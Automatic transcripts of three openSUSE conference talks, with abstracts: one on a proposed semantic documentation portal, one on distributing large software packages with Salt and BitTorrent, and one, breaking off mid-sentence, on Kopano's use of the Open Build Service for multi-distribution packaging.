It has just a different view and another skin. And you see, okay, there are messages from people. Somebody has changed something anywhere. And it doesn't depend if this message is made by a human being or by a botter. So it's just about how it works. And what I want to show you, that's a bit complicated. So let this be, for instance, an article about a library, some Linux library. And then you have a description what it is. This is still a Wiki text. But you can enrich this with metadata, what it is. It has a number, an ID, something else. And you have messages to that build, for instance. So what we have seen at the last page, you see, okay, you can attribute, you can attach this to that. And for instance, I show you why it's semantic. If you are working with semantic, then you mostly, you offer your authors, you make it much easier for them to add it something. Because you say, okay, you have here a free text field. But you have also, if you want to add some data or other stuff, then people shouldn't think about how the logic is behind that you can do it, make it most automatically. So anyway, so now you produce metadata and text and everything. And it makes it possible that you can get some reports. So you can say, okay, give me all messages, whether something went wrong or use or maintenance reports or so. So now let's transform this into the problem we have in an open docs system. It's the same thing. It's the completely same thing. You have an article about a package. And then you have messages around that. You have discussions about it. You have maybe some posts made by the GitHub or somewhere else. And you want to attach this to that topic you're talking about. And this will make it much easier to find for people who are working with that, other person, others, people from the doc team, people from the community, what is going on on this topic. And it makes it much easier for the search to find it because you follow the Vicky way. You have always one unique idea. You know what the name of the problem is. And then you find everything around. Another thing is, no, it's the same window. This is a head or a special page. This is also media Vicky. And there you can search for something typical question for head or is what is about scissors. And then you get some results. You see here these are ordinary articles about scissors. And these are for instance, these are links. These are sources somewhere out in the web. If I would jump to that, then I come to another website. And this website has different categories or tags. And we can an idea behind this platform is to rate this information that you can see, okay, this article has a high quality or is especially for has good images or videos or something from a marshmallow that I know. Again, it's just about the principle. The principle is you have a great, nice search and everything you do, you combine it with good content. And you work in an intelligent way in combining categories, free text, search, and you will find everything very, very quick. You see, this is really quick searching. Yes. And a third one. Ha, no, unfortunately we need this one. Okay, Translate Vicky is an open source translation community. And it works like this. I don't know what to do today. Or maybe I can translate something for an open source community project. So I go to translate Vicky. And there are several projects. And it's the same like the translation tool you showed us before. You see, what's it like? Start it. What if I want to do it for you? I don't know. 
Sorry, it doesn't work. Okay. I let this, it's about, you go to your page and you see, okay, there are 10, 20 tasks I can do. I have several translations. I open it, take the translation, post it and everything is fine. So I can work as long as I want. And every little thing I do will improve the documentation. So what they do is everything you have to do for this documentation or improving the translation is very small steps, very small packages, no workload. You just control and say, okay, this is fine. This is not fine. And I can do it better. And this is the way I think we should go to is that we make small packages and you can say, oh, is this page outdated? Yes or not? Does it have a screenshot? Yes or not? Do you know better sources? Is this discussion really important? And then you get a great, a really, really, really great documentation. I can promise you. And what we have already at this moment, it's not a technical thing. It's a question about people and the content. Our experience is if you start any web platform, it's always about people and what content you really need because there's a huge amount. But in the end, you need at least 10%. 10% are what you're really, really looking for and the others are interesting. But so for a success story, you need these 10%. And this is what we are discussing today. What is necessary? And if you know what is necessary, then you can organize this very quickly. So I give back to Marcus Fahner. Thank you very much. Thank you, Richard. Okay, I close the presentation. I wanted to close this. So what we are going to do, or this is all, as I said, this is all up to now ideas. I want to put this for discussion. This is for general discussion. The documentation team will provide one person's work for one day per week to help as a gardener inside this. If there is something like an open doc portal one day, I added it as a hack week project for next week. And now here is my presentation again. Let me just see. Can I, yeah, I can jump to the one, let the one. I would like to carry on this, this cut thing, this cut thing, whole thing. So because knowledge sharing is not only a question of technology, it is also a question of people and content. As we have seen, there are many ways where we can get the content from somewhat or semi-automatic systems, but we also need people who do that. And we need to know if this is wanted and if it is feasible for us at all. And therefore, as I already mentioned, we have something in mind like the gardener, which I am already saying that I have the permission to devote one guy, one person of my team for one day a week, some hours of work to refine the results of the triggers. Hopefully, the community would have helped before that by rating, marking, tagging, whatever. But he would work in that because I think that's necessary, separating the weeds from the good, from the flowers. We already started to work on the open-suzer documentation. So Christoph, I think he's not, yeah, here he is. He already started working in the Viki. We have some administrative tasks like moving the Viki, updating, upgrading it and making it a starting place for documentation, for open-suzer documentation. We are working on that. That is already work in progress. But I want to go on, I want to move on with this. I want you, the open-suzer community, to tell me if this is something that is good or that is bad. I want to give this open doc thing for discussion, to put it for discussion for you. And so next week is Hack Week. 
And therefore, I added this as a Hack Week project. It's the Project 1514. And I hereby invite you to join me, us for that. And that's why now I'm open for discussions. We have a little more time because the next, I know the next speaker quite well. And he promised that he wouldn't start before I leave the stage. So if you have any questions, if you want to tell me that this is total bullshit that I just talked, which I don't think will happen because I had an expert here. Thank you, Richard. So, any questions? Was it that much input? Or was it that stupid? Or both? It needs to settle, huh? So, the next steps would involve, like I said, the Hack Week project or the Hack Week maybe discussions next week. Question? No. Oh, okay. Also waiting. So the next step would involve the Hack Week. Next week, with discussions. And finding out if there is interest in the community in this project. And then we will see. I hope that we can start something and make something here. And have some nice summer months working on that. Maybe something like a summer of documents with having something that we can present at the SuzyCon in November, whatever. Okay. You've had your chance to ask questions. Thank you. Thank you, Richard. No worries.
A suggestion for a new approach to documenation. "Breaking the perception that a rolling release cannot be documented" Forums, mailing lists, wikis, release notes, Git commit comments, QA tools like Open QA and many more: A vast abundance of resources offer indicators for documentation. However the data is neither collected nor structured nor viewed at all, mostly because everybody thinks it's a tedious work. But modern knowledge management tools can collect the data, structure it, add semantic analysis and put it into a format that a community can benefit from - with minimal human input. Imagine a website like Stackoverflow or Reddit, but (open source and company-independent) with automated input, but ranked by interest (views), helpfulness and discussion thread length. The input triggers could become an open project, like Open QA's tests. A "Doc Gardener" could then pick up the most important tasks and move them to openSUSE wiki or Enterprise Documentation, at the same time helping the community and spotting pain points of the community.
10.5446/54601 (DOI)
Can you turn down the light a little, please? Perfect. So hello, everybody. My name is Marcus. You can best reach me by email. I have to think about GitHub for another two months and so forth, and Twitter, or all these things. I work for a big company whose name I won't mention in the recording. You can ask me who that is. And I started about a year ago to convince my superiors to explore the possibility of distributing software not the way we've done it before, but by using peer-to-peer technology. So this was granted. And since then, I learned how to combine peer-to-peer with Salt, and I hope to have your attention. Speaking of you: who has used Salt for more than half a year regularly? This is about five out of, one, two, three, five out of, I think it's about 10. Let's say it's 12. Let's say 12 is 10. More people have used it for more than half a year. So half of you are not really deep Salt users. Who of you uses more than 50 minions? One. Thank you. Are your minions, are your minions agent-based or agentless? Agents, they have agents. And who uses an agentless minion, salt-ssh or something? Yeah, nearly two. Okay, I don't. Those of you who use Salt, you are aware of the execution modules, how to write them; of course, we've seen it today. Perfect. Who actually has Windows minions? This is exactly one person. I knew it. So here I stop. So most of you use Salt for Unix. I don't. I have it only on the Salt master. And it works well. There are strange things, there are always strange things, but it works. It works on Windows, so you should try it. Who of you uses Salt for an Apple minion? Again one person. Okay. Who of you uses, this is just for curiosity, who has used RAET so far? Right, exactly nobody. Me neither. I haven't used RAET so far. On one of the slides, I will come back to the RAET question. So as I said, I distribute software. Who of you distributes software to end-user workstations or laptops? Kind of two, kind of three. Retail, what does that mean? What? Point of sales or? Okay. Yeah, yeah, I see. Well, yes. So, and how big is the software library you have to deploy, like hundreds of megabytes? Yeah, not too big, not excessively big. Well, I can just talk for our customers. We have requests for distributing large files, like videos for the digital signage or price list updates or so. So yeah, we have that request. So far we haven't solved it with Salt yet, but we could. Yeah. Okay. The big files. In fact, this talk is about big files. Also this talk is about the fact that this company is very distributed, into the last corners of Germany and outside of Germany, mostly Germany. And the problem with this large distribution is that many, many of these networks are weak. So when you are working in data centers, or, I haven't asked, who of you works in a data center then? Again, only one person. Okay. Good. So, I have to live with networks which are as bad as 10 megabits per second or even worse. And they are not really reliable. And many, many people need these slow connections. So most of the time the networks are extremely full. And then we need to distribute big software. And this obviously is a problem. The fun part is also that some of these very bad locations shut down at night. So you cannot transfer it overnight. And all silly things happened, including sending USB sticks before. Yeah. Very recently, like yesterday, there are now 700 minions running. So this is the current situation.
Sorry. This is the current situation. I wanted to show my wonderful t-shirt, so I stood here. So this is the situation for the customer. He is aware that whenever he has a new piece of software, he will wait for one day, because we have to set up the mirrors. Mirrors meaning server copies of the repository spread out. And we think outside of Germany there are around 1,000 mirrors. Then if it's a big piece of software, he, the customer, is used to waiting for five weeks. Big software starts at 200 megabytes. He's also used to paying if it has to be quicker. And he's also used to paying if it's bigger than one gigabyte, and really paying a lot. Really, with the current system you cannot transfer software which is bigger than one gigabyte, which happens. What I want to achieve is to get rid of all the mirrors: if the software is already at some workstations, it's enough to transfer it from there. I don't have a... I can walk. So if it's already on one client, it's enough to copy it to the others. This should be one location. And we no longer want to distribute the same thing four times to four workstations in a location. It should be enough to transfer it once and have the location find the optimum. And if that location is in fact nearer to another location, the second one should not even ask the central repository, which could be more distant network-wise. So that's the idea. And as a slogan, I thought: here we treat software as if it were a material like gold or metal, which we would have to transport each time from a warehouse to the destination. Whereas software really is information, which can be retransmitted once I have it. I make this so explicit because it's not very complicated, but we have a very deep mindset about how to distribute software. In fact, I think all of you do. I today learned about Ceph. I'm not sure how Ceph works or how Ceph nodes work, but maybe you can tell me. What I have here is a kind of distributed database, a distributed repository of software. And let's assume I only want the same software. Then I don't need to copy it again from the original source. There is this one very good piece of software already invented, which is called the peer-to-peer BitTorrent protocol, which has been adopted by... this was a Dutch company doing it in 2008. And they had around 7,000 workstations at that university, which earlier needed four days to distribute to and install on all of them. And with the peer-to-peer approach, you can get rid of all these 20 mirrors, they call them distribution servers, and do it in four hours. Nice success. And somehow this company then went bankrupt or defaulted, as I think it's called in English. Twitter has published that they can now update their worldwide 10,000 servers in 12 seconds and no longer in 15 minutes with peer-to-peer technology. Good. Facebook, same thing: incredibly, one minute for a worldwide distribution of software. You could not possibly send the same thing 10,000 times from one location. This is all good news, and it is an established technology. And the question is, why does only Microsoft continue with this? So why is Microsoft better than the rest of the world? Do you have any idea, or can you suggest anything? Yes? All sites have problems with using peer-to-peer technology due to firewalls and monitoring of firewall behavior. And this leads admins or policies at sites to be very fearful of BitTorrent. Particularly in academic circles, there's a very deep distrust of PhD students and what they might be doing with BitTorrent. Okay. Yes. Interesting. Good.
Then one has to take that into account. In fact, that's a valid answer. Thank you. Lucky for me, no firewall so far in the world of that company has any objections against peer-to-peer traffic. And yeah, let's continue. I will give a live demo now, but I let you choose: first you see the live demo, or how I did the implementation, the integration of peer-to-peer with Salt. What do you want to see first? The demo or the theory? Who's for demo? And who's for theory? More, yes, and you anticipated that, because the theory slides are in front of the live demo. So we've seen some YAML before. Again, this is YAML in the top file. I chose the top file because once I had the Python, which I show you on slide three, it was the easiest to put it into the top file. Maybe you could write a state module, but as I'm just a simple mind, the top file works, and you can tell me if it's better to put it into a state. So what you see here is we have the base configuration, a particular machine, and this is of course a long list of machines. We scrap every peer-to-peer file, or peer-to-peer payload; except, in fact, I first give the command to delete every payload which isn't on a list, which I will show you shortly, and then I put two payloads on that machine. This is how the top file looks: first delete everything, and then make sure only these two files, which are named in that state, exist, and then put these two. What does that mean? Let's have a look. When I say delete everything except these ones for that machine, I have a peer-to-peer function which does exactly that. It deletes everything which is not on that list. The idea is that one day I could shorten the list and then that would be deleted. So I don't tell what has to be deleted; I tell what has to be there, which is, I don't want to say idempotent, we've heard idempotent so often today, the idea of idempotence. Then, when I want to say that this particular file or payload, in this case it's a file, but it could also be a directory, needs to be transferred by peer-to-peer, I need to give a few pieces of information: the name of the thing, the info hash, which is the MD5 checksum, and all the IPs of the other clients which already have it or are supposed to have it. They may not have it completely; it's enough if they have a part of it. Then peer-to-peer is smart enough to get what you need. So, questions so far? No, good. And then you simply have to implement the Python functions. You call any peer-to-peer library you want. This works very well. And I also found it elegant that these functions instantly return. So it's not that the command keeps on running as long as it's not finished; it instantly returns with the percentage or with an error. So all these functions instantly return. I found this useful. So now let's switch to the demo. I have a web interface. And I have the Unix shell on my master where a kind of a loop runs, which I call the dispatcher. So let's insert. So this payload, which is 500 megabytes of static nonsense, just 500 megabytes of data: let's add four or five more clients to these 30 which already have it. I have to choose add. And now these five clients have been added. As you see, in the same moment something happens and Salt is called with the list of these minions and executes a highstate. Why a highstate? Because I have manipulated the top file. So the top file tells just one thing. It has only one purpose: to distribute files.
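The talk does not show the module source, so the following is only a hedged Python sketch of what such an execution module could look like. The module name p2p, the status-file handshake with a local BitTorrent client and all function names are assumptions made for illustration.

```python
# _modules/p2p.py -- hypothetical sketch of an execution module along the
# lines described in the talk.  The function names, the status-file layout
# and the idea of delegating the actual BitTorrent transfer to a separate
# client daemon are all assumptions; the real module is not shown.
import json
import os

STATUS_DIR = "/var/lib/p2p-payloads"   # made-up location written by the client daemon

def ensure(name, info_hash, peers):
    """Ask the local BitTorrent client to fetch/seed a payload.
    Returns immediately with the current completion percentage."""
    os.makedirs(STATUS_DIR, exist_ok=True)
    # Hand the job to the client by dropping a small job file; the daemon
    # picks it up asynchronously, so this call does not block.
    with open(os.path.join(STATUS_DIR, name + ".job"), "w") as fh:
        json.dump({"info_hash": info_hash, "peers": peers}, fh)
    return progress(name)

def progress(name):
    """Read the completion percentage the client daemon reports."""
    status_file = os.path.join(STATUS_DIR, name + ".status")
    if not os.path.exists(status_file):
        return {"name": name, "percent": 0}
    with open(status_file) as fh:
        return json.load(fh)

def absent_except(keep):
    """Delete every payload that is not on the 'keep' list, i.e. the
    'tell what has to be there' idea from the talk."""
    removed = []
    if not os.path.isdir(STATUS_DIR):
        return {"removed": removed}
    for entry in os.listdir(STATUS_DIR):
        payload = entry.rsplit(".", 1)[0]
        if payload not in keep:
            os.remove(os.path.join(STATUS_DIR, entry))
            removed.append(payload)
    return {"removed": sorted(set(removed))}
```

From the master such a module would be callable like any other, for example salt '*' p2p.progress <payload-name>, and the generated state or top file only has to pass the name, the info hash and the peer IPs.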
I create the top file and the states dynamically. So this routine here creates a top file dynamically. Maybe that's very silly, but it works. So every 32nd, the command is executed again. So the first time it executes, it will just report us that it has received it for the first time. Everything has been distributed, of course. Oh, now we have a very, I didn't thought. I can make that a little bit smaller without hurting your eyes, I think. So let's put that on change settings, appearance, a little bit smaller. That's good. So what we see here is that these files have been added. And what you see here is an error. They should not be added more than once. So I apologize. I stop this loop and I have to manually create payload and the top file again. I don't know why that happens. And continue with my stupid loop. Beauty of life demo. So what we do from a salt perspective is issuing high state. And if we have set up a top file and all the SLS correctly, which we in this case didn't, then it's been done just by calling the high state. So in the background, all these minions have been trying to reach each other. 30 of them already have, and that list of IPs here includes, of course, the 30 minions which already have the files, and they are being contacted by the newcomers. And so they exchanged these files. So including that glitch, the system works reliably, I see. So we have in fact distributed a number of customer software with it. So what's not called static really is client data. So we distribute mainly GIS software. This means geo maps are big. So these things are bigger than 10 gigabytes. And either they are transferred with USB sticks or with this system. So this is preferable. Now we can admire the velocity. It's not a very high velocity. I have chosen a very low transport rate for security reasons. But what I found is that the peer-to-peer technology, once it can pass, the firewall works very reliably. So this so much for the live demo. You have now also seen the two commands which need to be executed, which in fact isn't bad. I should have shown them anyhow. First the payload SLS, the state file, must be created, and the top file must be kept actual. Somehow I wrote something bad. So we can wait for the numbers to come to 100 or you can believe me. I won't even ask you. What I've done for you is to execute a command that puts all the necessary software for the peer-to-peer client on the minions I measured how long it takes to verify that all exists. And it's about three seconds. So for all attached minions, the response of is my client. Updated takes three seconds on average. It even goes, no, it takes, sorry, 14 seconds on average. The best time is three seconds. These are the three seconds which is best. It has a good average of 15 seconds. I'm happy with 15 seconds and then all these minions which are late, they may be late for a reason. I don't care. But this was the day when I was very happy. So I had 70 clients. And they were all responding to me in 15 seconds on average. Life was good. In fact, even the more minions, the less time on average it took. So I thought, wow, salt is really scaling. I'm excited. Then yesterday, the 700 minions came and I very in short time continued the diagram. So here are the 70 which we just saw. And what I would have hoped and expected was it continues our very great average of 15 seconds. It did not. For some reason which I'm not able to find out since yesterday, it now takes a high amount of time. The more minions I use or I probe. 
In fact, I have a very steep slope now. I had only two seconds to ask Tom why that is. And he just asked me which version I'm using, a rather old version of Salt, that's 2015.5, and he suggested using a version where this behavior is known and fixed. I will do that. But I also wanted to take this occasion to ask you: have you experienced, you all see that some of your minions return very, very fast and some of them slower, have you seen something like this before, or do you see no growth in response time with higher numbers of minions? Joe again. Yeah, there's no easy answer. You have to really look at different kinds of problems. So if you run out of memory on the server, for example, this can easily explain those things. If a machine starts swapping out, for example, or if your network gets so saturated that the server thinks it's confronted with a SYN flood and some of the protection kicks in. Good. Good answers. What you can always do is batching. So if you just switch on batching and do 10 at a time or 50 at a time, you won't have the instantaneous response anymore, but you can be sure about those batches: if the server can handle 50, it will handle 100 and 1,000. It will just do it in batches: 50, 50, 50, 50. David? Yeah, it still can handle 700 very easily. Like Joe is saying, when you start to get into the thousands, there's a few things to look at. One is the performance of your master. If you're on a smaller server with a gigabyte of RAM, you might have to bump that up. There's a lot of settings in your master config file where you can tune it to deal with the large amount of minions and that type of thing. I've worked with a lot of customers' sites where having four or five thousand servers is really quite simple. Good. So 700 should be fine. In fact, take this as a mistake I made, but I would like to share the findings in some form with the community and say, okay, the better results should then be published, and we should think of a way how to do that. Also, if you see something like that, look at it as an example of how you recognize a problem and how you resolve it. In fact, I would expect that we can continue on to 100 million without any slope in response time. Thank you. On the peer-to-peer part of the presentation, the skeptical points we already had, like universities not wanting to allow the peer-to-peer protocol in itself: who would be interested, or who would like to know more or stay in contact? Yeah, good. Maybe as a background: one of the retail customers we had was actually thinking about that back when it wasn't BitTorrent, but eDonkey was the tool of the day. Those projects are usually stopped for the reasons that Owen mentioned, that people have this fear of peer-to-peer networks. But I know that some of the hosting providers, like Headstaff for example, have been using an rsync-based mechanism that works very similarly for years, where basically you seed one machine and then other machines would just rsync from their peers. That has worked well. Interesting.
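The batching suggestion from the audience does not require any change to the states. Here is a hedged example of what it could look like from the master's Python API; the target pattern and the batch size are just placeholders.

```python
# Hedged example of the batching idea suggested above, using Salt's
# LocalClient from the master.  The target '*' and the batch size are
# placeholders; adjust them to your environment.
import salt.client

local = salt.client.LocalClient()

# cmd_batch returns a generator and only keeps e.g. 10% of the minions
# busy at any one time, so the master is never hit by all 700 at once.
for returns in local.cmd_batch("*", "state.highstate", batch="10%"):
    print(returns)
```

On the command line the equivalent would be salt --batch-size 10% '*' state.highstate.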
In fact, the company has very bad experiences with broadcasting, but it depends on the circumstances. Thank you for your attention. I'm one minute over the time. Now the party begins. We stay in contact right now. We have a look at this continued until 99 percent and it's not reported. 100 is never reported. No, really, it's not. It's not a joke. It only reports salt-wise. It's like it returns at false. What we learned today from Tom that you have this dictionary which can return the result, which is only represented when it's false. So the 99 percent is something which is wrong. 100 percent on the other hand is something which is correct and therefore it's not reported. So any more questions? Thank you very much for your attention.
Our task is to distribute software to Windows clients. Our network contains slow links and relay-servers, which must be staged up. Our goals are 1) reduce WAN traffic, 2) allow unlimited size, 3) allow unlimited number of clients in one rollout, and 4) start rollout without delay. Idea :: BitTorrent Peer-to-peer (P2P) reduces WAN traffic because if prefers local content over remote content. Beneficially for the concept, all clients are centrally configured: no peer can be a leach. Clients act as a storage resource for other clients, eliminating the need for relay servers. Realization :: We found that Salt manages a BitTorrent agent nicely with Salt-states. Experience/Result :: We have continuously distributed 2 GB per day to up to 50 Minions for over 2 months. Clients and network are undisturbed, while a Salt-Master on a regular desktop administers 50 Minions effortlessly. We fully meet all of our goals. We observe an increasing and by now high reliability with P2P and Salt (in this order), but glitches still occur in both domains. Live Demo :: How to distribute 500 MB, present at 4 clients, to 8 more clients? During transmission, we will stop the P2P service on some of these 8 clients via salt and then start it again, to simulate clients going temporarily offline. Next Steps :: Making Minions 'more active'. Activating and deactivating the P2P service on demand.
10.5446/54604 (DOI)
Okay. Yeah. Thanks for coming along. Glad to be here. I put on my shirt with a tie especially; I really wanted to look fashionable for you. So my talk is about OBS and the real cool stuff. I must say I'm quite biased, because I really love OBS and what it's capable of. And we as Kopano were in search of a new build system which is efficient and fulfills our requirements. And yeah, it was not hard to choose OBS in that regard. So, a small agenda. I want to show you who Kopano is and what we're actually doing, what our requirements were, what we did before, which is quite funny, why we're using OBS, what is really awesome about it, and cool stuff you might not know. So I'm certain this is the openSUSE conference, right? So there are a lot of developers here, most likely Adrian is also sitting somewhere, and many others. I bet there are people here that know more about OBS than I do. But it's, I think, quite a good insight. And I must add that there's one thing you can call a running gag, which I even encountered two days ago here at the conference, which was like: guys, what about documentation? There's a big question mark behind it. So there's so much of OBS that is not really documented, which is very unfortunate. And that is also one of the reasons why I try to find some ways of getting this better. Yeah, it always starts with yourself. So I offered myself here for help as well. And I think this product really deserves it. You'll see it. So yeah, we use OBS; what are our requirements? So essentially, we're now in the communication world for, yeah, close to over 10 years now. We're the only open source MAPI implementation in the world. And I'm talking real MAPI. So everything regarding MAPI attributes, the whole MAPI-based structure, all the MAPI attributes that you can literally set for an object, that's 100% in our solution. Our motto is like: sharing and communication software for professionals. So yeah, everyone can set up a Dovecot and just have, like, a Thunderbird slapped onto it. But traditionally, yeah, the more efficient you want to get, the more features you need, as in calendaring, and really professional calendaring, with invites and with time zone problems that you have to overcome. And I'm saying this because Kopano Core, or Kopano in general, is just what Zarafa used to be, at least for the open source part. So we had quite some closed source components beforehand. And now literally almost everything is open source, completely under the AGPL. And our business model is essentially, yeah, subscription based, just like SUSE, just like Red Hat, nothing special here. So we provide support, professional services, tested binaries and extras. So since we exist now for over 10 years, all kinds of people have, yeah, specific requirements. I mean, it's very hard to go to an environment and say, yeah, you can only sell your product to one platform. Of course, that would make life easier, right, if you just provide RPMs. But we have such a diverse, yeah, diverse customer base that we literally have to come up with all kinds of funny things: from Debian, of course, which is not funny, but really RHEL, SLES, Ubuntu, everything, and even two special things, which are Collax and 1A. Just a question to the audience: does anyone know here what Collax is? So does anyone know what Univention is? Okay, there's more. So Univention and Collax have some similarities. So it's an own spin of your own type of distribution. The problem is, it is not comparable from a spread perspective. Yet we do have a good partnership with Collax.
And this product in general, it's not so bad, but it has its own archives, it has everything on its own. It's not just plainly based on Debian, so you have to do certain things to support it. And we also have one distributor in the Netherlands, actually a very good partner of ours. They have, for whatever reason (don't ask me), chosen Slackware as a platform. So Slackware is like: put everything into a tar.gz and just unpack it onto the target and you're good. That's their kind of package management. And of course, you want to build something for that as well. Our goal was not to have a build system that builds for this platform and that platform and that platform separately; we wanted a unified solution. So yeah, this sounds a little bit like bullshit bingo, but if you execute on this, you do quite a good job and you can deliver quite well on quality. Continuous integration, as in you have your development steps and your process well defined and well executed; continuous delivery, as in you deploy your software in such a way that when you provide a patch, it's available almost instantly. One problem that we really had was 100% reproducible builds, and yeah, that ties in with the chroot build environment, and we wanted it scalable and fast, because we seriously had scalability issues. So what did we have two years ago? This list doesn't look that long, but you can expect that it was a heck of a lot of work. So yeah, indeed, we have existed for over 10 years, so we started with SVN. And our problem is that we also have parts that are built on Windows, and the only way you can really control that well is to use SVN, at least at that time; I mean, Git 10 years ago, think about it. And then we had manually created chroot environments. So essentially when a new release came out, when RHEL 7 popped out, we just made an install, we got this chroot, and we executed everything in those chroot builds, a little bit like the principle of what OBS actually does, but just in a static way. So we did it once, not with every build. That was a heck of a lot of work and error prone. I mean, we're talking about a developer knowing, oh, I just updated gperftools, for instance, but he forgot one distribution. And so you got diverging results at the customer. And of course, this is something that you really don't want. We didn't have any repositories. Yeah, we could have provided them as an extra step behind all of our builds, but in our delivery we didn't have this continuous delivery mentality. So why make repositories if you don't really deliver as you would expect nowadays? Also, what was quite a problem was that we had entirely separated builds. That is, we have a component called Archiver, for instance. Archiver and Core share some libraries. And when these two components are built asynchronously, because they're still separate products but with the same shared libraries, so when you say build this now, build Archiver, and you have a Core which is not released in tandem, then you could get into issues regarding changes to those libraries. Of course, this is something that you want to prevent. Yeah, for every release we had a huge amount of manual labor to do, and a huge checklist as well. And we had no OBS whatsoever. Also, a problem regarding OBS, a little bit of an aside: OBS loves SUSE, obviously.
The problem is that in our company there are like two people who really do SUSE-ish stuff, nobody else. And that is quite a problem too. So you tell people, this is awesome, you really have to use it, and they say, oh, it's SUSE right now. It's not that they say they don't like SUSE, but they have never really touched it. So there was quite some work to do there. So let's go through the requirements a little bit. Here's a bit of an overview. I know it looks a little cluttered and like a lot, but that's also the strength of Kopano, because it has this extreme modularity. We have customers with 50,000, 60,000 users running in parallel, and you can only make that happen by splitting up certain roles. That means you can say, for instance, that the mail delivery components, the spooler and the delivery agent, are separated onto different nodes, and that you have your mobile devices on a different endpoint web server. Because, I mean, when we're talking 50,000 concurrent users, then you must know that with 50,000 TCP sessions on one web server you're getting a problem. So you need this ability to distribute. The good thing about this is that everything you can see here can also run on one node easily. I mean, this can even run on an ARM board, just a Raspberry Pi; fire it up and you're good. But the idea is still that you have a lot of components, and you have to get the relations between them right. You have to have the shared libraries working with each other and the binaries using them. So our requirement was to have something that does a lot for us, and in fact OBS does that, by essentially having automatic requires, simple visibilities, and many other mechanisms where you can really just make sure that the tags you're using match each other. So here we're good. The next thing was that we were primarily only on the 64-bit and 32-bit stream, obviously, so i586 and x86_64. But our goal was also to be able, at least for community reasons, to provide builds for other platforms as well. Here you can see POWER8, here you can see ARM, you can even see mainframe. And this is actually just a snapshot that I made tonight, so yeah, not much happening tonight, but in fact we really need this power. So there are quite some good workers there. So architectures: yes, no problem. The next thing was, we have a real communication stack, and this communication stack is also defined by single products. For instance, we have a product called Archiver, and Archiver you don't necessarily need. It's just something that someone needs when he's archiving. So for us it's literally a separate product. We don't say you have to install Archiver, it's not a necessity to install this component, and that's why we provide separate repositories for these. And it also allows us to have straightforward and independent release management, meaning WebApp, for instance, is quite fast in development terms. So WebApp always receives quite fast updates, and Core sometimes lags a little bit behind in that regard. So we are able to release WebApp independently from Core in quite a good way, and we wanted to have this in a product-based scheme, because our team is quite distributed. You could compare it, if you take the SUSE terminology, to SUSE Linux Enterprise Server and the High Availability Extension. They are also released in tandem, but the updates are released separately. So that was also quite good. Now we come to the special requirements.
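Before that, a quick illustration of the per-product setup just described on the OBS side: a minimal sketch of a project meta declaring a couple of target distributions and architectures. The project, repository, and path names are placeholders, not Kopano's real configuration, and the exact distribution project names depend on the OBS instance you build against; you would feed something like this to the server with osc meta prj.

    <project name="Kopano:Core">
      <title>Kopano Core (example)</title>
      <description>Per-product project with its own repositories</description>
      <!-- one repository per target distribution -->
      <repository name="openSUSE_Leap_42.1">
        <path project="openSUSE:Leap:42.1" repository="standard"/>
        <arch>x86_64</arch>
        <arch>i586</arch>
      </repository>
      <repository name="Debian_8.0">
        <path project="Debian:8.0" repository="standard"/>
        <arch>x86_64</arch>
      </repository>
    </project>

A sibling project like Kopano:Archiver or Kopano:WebApp can then build against these repositories via its own path entries, which is what keeps the shared libraries of the separately released products consistent with each other.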
Collax and Slackware, believe me, that was quite a nightmare in the beginning, but in the end it was awesome. Then we use the whole Atlassian stack. Atlassian, I mean, they have great products. We use Jira, we use Confluence, we use Stash, which is now called Bitbucket, and we wanted to integrate it in the most sane way. So continuous delivery and/or continuous integration is defined by the fact that when you commit something, you instantly want to know the result. Our code base, just to give you an idea, just Core, nothing else, is 600,000 lines of code of all kinds of C++ and Python. So the effects that a single commit can have can be drastic, depending, of course, on what you touch. Then we also have, not yet, but we're working on it at the moment, the requirement to build images, and we don't want to use every distribution's independent toolset for that. So we're talking here clearly Kiwi, which is perfectly integrated into OBS. Also the _service file, which helps you a lot with versioning, so you don't have to do everything yourself, like version tagging and so on. You have one place to do that, and that's in your Git repo, nowhere else. One of the requirements also was to be really, really, really, really, really fast. Just to give you an idea, we had builds beforehand that were taking hours, and now we've got them down to, in the worst case scenario, 10 minutes, well, maybe 12, 13, but that's really the worst case. Normally we can make it within 500 seconds. Yeah, and do QA, that really matters. So we needed to build up quite a new chain. That also helps us, of course, not to do everything in manual labor. In communication software it's quite hard to do everything automated, because you have so many potential issues. So the checklist still exists, and you need to have it, and that's our model, essentially; that's what you're paying a subscription for. So now I think I've bored you enough with background, so I want to show you a little bit how that worked out. Here on the right-hand side, you can see the commit that was necessary in OBS to allow it, essentially, to pick up the build collax file which we had here. It's nothing super special, it's available in 2.7, but the awesome thing is that you literally just have sort of a bash script which gets executed; think of it as its own type of spec file. We could have, you know, developed some sort of compatibility with a spec or a Debian file, but it was simply not necessary. So the only thing that we needed to do is essentially look for the build collax file, and you can build for that. The cool thing about it is not only Collax: you can do all kinds of funny things with OBS. So in the end, it's just a one-liner, plus actually adding something to be listed, and you can go with your whole description set on how to build for that platform. Very straightforward, nothing special to do. So what have you got to do? You make a binary import, here's the link. By the way, I think the documentation for this can be done a bit better. I'm thinking of documenting it way better from our side, but it's helpful, so you'll find your way, I bet. And you make your local build collax file. I gave you a real-world example directly on paste.opensuse.org, which you can just fetch and use. Yeah, change it to your needs, of course, if you don't want to build Kopano. And the next thing was Slackware. That was, to be honest, quite a bit of work.
The problem is that Slackware does everything in tar.gz. They don't know anything else but that. So what they do is essentially: they fetch a tar, they compile it, they re-tar the result, of course, and they literally use this tar file as the binaries, and these binaries are unpacked on the target system. In general, not that complicated. So OBS is capable of doing that. The only thing is, we didn't upstream it, for two or three reasons, actually. One reason was that we checked the forums and we hadn't seen a single request for doing Slackware, so we thought it might not be interesting for upstream. The second thing was that we essentially hijacked the functionality of Arch Linux in that regard. So in OBS, you have the awesome possibility of just selecting the repositories or just pointing to them on build.opensuse.org. And since we, you know, bent Arch just to get done what we wanted, because we simply don't need Arch, at least not yet, we just hijacked it. So the patches that are required for that are also here. If you think you have a better idea on how to integrate it, or to make a separate target like a build collax, go for it. That's why I wanted to share this. Yeah, so the binary import is literally the same as with Collax, just with the difference that you really just take the tar.gz files. Because the patch set also takes care of that: okay, I unpack them directly with tar, and in the end I take the results and repack them, and that's the whole workflow behind it. So it's quite simple. And here below, you also have a link which you can simply use. With this link you have a description, and you can just take over one by one what Arch does. We didn't have this format problem with Collax; there it was quite natural, because they have sort of a special packaging mechanism, and just taking dpkg, for instance, wouldn't work for them. Therefore we decided that here we can just hijack it from this other distribution. It is quite awesome to integrate with Stash or Bitbucket or whatever code management service you have. You can also integrate with Subversion; we even had that, as a post-commit hook. So when you really want to make sure that every build you're building, no matter in what branch, no matter in what area, gets picked up, you can just create a so-called post-receive hook in Stash (sorry, 